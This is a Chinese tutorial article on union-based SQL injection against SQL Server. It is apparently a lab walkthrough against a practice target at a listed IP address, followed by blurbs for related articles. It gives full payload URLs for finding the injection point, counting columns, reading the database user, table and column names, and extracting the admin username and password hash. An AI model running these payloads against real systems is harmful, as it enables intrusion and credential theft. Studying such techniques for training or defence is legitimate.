sql server数据库如何进行sql注入
1、判断数据库类型
抓包知sql server,所以注入语句跟MySQL有些区别
2、判断注入点
“http://219.153.49.228:42514/new_list.asp?id=2 ”,当id=2 and 1=1时显示正确,id=2 and 1=2时页面报错。
3、确定列数为 4
/new_list.asp?id=2 ORDER BY 1成功/new_list.asp?id=2 ORDER BY 2成功/new_list.asp?id=2 ORDER BY 3失败/new_list.asp?id=2 ORDER BY 4成功/new_list.asp?id=2 ORDER BY 5失败/new_list.asp?id=2 ORDER BY 6失败/new_list.asp?id=2 ORDER BY 7失败
根据这些信息,
ORDER BY 4成功,而ORDER BY 3失败,这看起来很矛盾,因为一般来说,如果ORDER BY 3失败,ORDER BY 4应该也会失败。分析原因:
SQL查询结构: 可能你查询的SQL语句涉及了多个表连接或者子查询,这会导致某些列存在而其他列不存在的情况。
自定义排序: 数据库的查询中可能存在自定义排序逻辑,某些列可能只在特定条件下可用。
***所以sql测试中,我们需要进行更多测试以确认列数
4、判断回显字段
这其实还要分两种情况:
1、回显的字段是字符型,还是整数型或其他
数据类型匹配:
数据库表中的列有特定的数据类型(如整数、字符串、日期等)。当注入的值与列的数据类型不匹配时,会导致SQL语法错误或类型错误。例如,如果某列期望一个字符串类型的数据,而你传入一个整数,数据库可能会报错。SQL查询构造:
SQL注入构造的查询语句需要与数据库表的结构和列类型匹配。使用单引号包裹的值通常被解释为字符串类型,而不使用引号的值通常被解释为数字或列名。
2、注入成功是要在页面正常显示情况下回显字段,还是页面报错情况下才会回显字段
正常页面:当提供的id值有效时,原始查询会返回一个正常的结果集,页面会显示该结果。如果 UNION ALL SELECT 注入成功,并且注入的列恰好在显示内容中,那么注入的结果可能会被id值结果覆盖。错误页面:当提供的 id 值无效时,原始查询失败,页面可能显示错误信息或没有结果。在这种情况下,注入的 UNION ALL SELECT 可能成为唯一的结果集,因此被显示出来。
思路:
①先假设为全部字段为字符型,payload:http://219.153.49.228:46552/new_list.asp?id=2 union all select '1', '2', '3', '4' 。发现并没有回显
②id=-2时,页面报错,所以payload:http://219.153.49.228:46552/new_list.asp?id=-2 union all select '1', '2', '3', '4'。回显2、3字段
到这已经可以判断出2、3字段是字符型,并且页面有报错信息时才有回显,否则被内容覆盖
然后判断1、4字段类型,需要一个一个去除单引号,判断其回显情况
5、获取数据库信息
http://219.153.49.228:43696/new_list.asp?id=-2 union all select 1,user,db_name(),4
6、获取数据表名manage
http://219.153.49.228:43696/new_list.asp?id=-2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='U'),'3',4
7、获取列名:id、name
http://219.153.49.228:43696/new_list.asp?id=-2 union all select 1,(select top 1 col_name(object_id('manage'),1) from sysobjects),(select top 1 col_name(object_id('manage'),2) from sysobjects),4
以此类推,获取第3个字段,第4个字段
8、查出用户名和密码
用户名:admin_mz、加密密码:72e1bfc3f01b7583
http://219.153.49.228:43696/new_list.asp?id=-2 union all select 1,(select username from manage),(select password from manage),4
9、md5解密
9、总结
1、判断数据类型是很重要的一点,影响后面的注入语句
2、确定列数时,要多测几组数据,从而分析判断列数,并不是遇到第一个报错就停止测试
3、正常网页(例如id=1,参数正确)没有注入回显时,试试报错情况(id=-1),注入回显有可能被正常返回数据覆盖
4、注入回显的字段有可能整形、字符、小数等,注意是否需要单引号
5、最好先全部统一会先字段类型,比如全部整形,挨个轮流改变为字符形
到此这篇关于sql server数据库如何进行sql注入的文章就介绍到这了,更多相关sql server数据库sql注入内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!
相关文章
这篇文章主要介绍了Sql Server 数据库中调用dll文件的过程,非常不错,具有一定的参考借鉴价值,感兴趣的朋友跟随脚本之家小编一起学习吧2018-05-05
需求如下:需要远程连接外地的SQL Server 2000服务器。2009-07-07
Windows下使用性能监视器监控SqlServer的常见指标
这篇文章主要介绍了Windows下使用性能监视器监控SqlServer的常见指标,常见指标包括Buffer Cache Hit Ratio、Pages/sec、 Available Bytes、Disk Time、Avg. Disk Queue Length、Processor Time、Processor Queue Length等,需要的朋友可以参考下2015-02-02
该语句请慎用,被删除的数据将不能恢复。2009-08-08
sqlserver2005 行列转换实现方法,需要的朋友可以参考下。2009-10-10
这篇文章主要介绍了配置SQL Server数据库恢复模式的两种方法,需要了解的朋友可以参考下2015-10-10
创建链接服务器。链接服务器让用户可以对 OLE DB 数据源进行分布式异类查询。在使用 sp_addlinkedserver 创建链接 服务器后,可对该服务器运行分布式查询。2014-07-07
开发业务需求,需要对一个表作数据分析,由于数据量较大,而且分析时字段会随条件相应变化而变化2012-01-01
这篇文章主要介绍了SQLServer批量更新两个关联表数据的方法,提供了2种关联查询与更新语句的使用技巧,具有一定参考借鉴价值,需要的朋友可以参考下2016-08-08
这篇文章主要和大家一起探讨了SQL Server并发处理存在就更新的7种解决方案,具有一定的参考价值,感兴趣的小伙伴们可以参考一下2017-06-06
最新评论